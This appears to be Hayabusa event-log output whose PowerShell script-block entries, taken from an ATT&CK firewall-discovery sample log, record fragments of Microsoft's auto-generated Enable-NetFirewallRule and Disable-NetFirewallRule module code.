[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', 
SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssocia",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 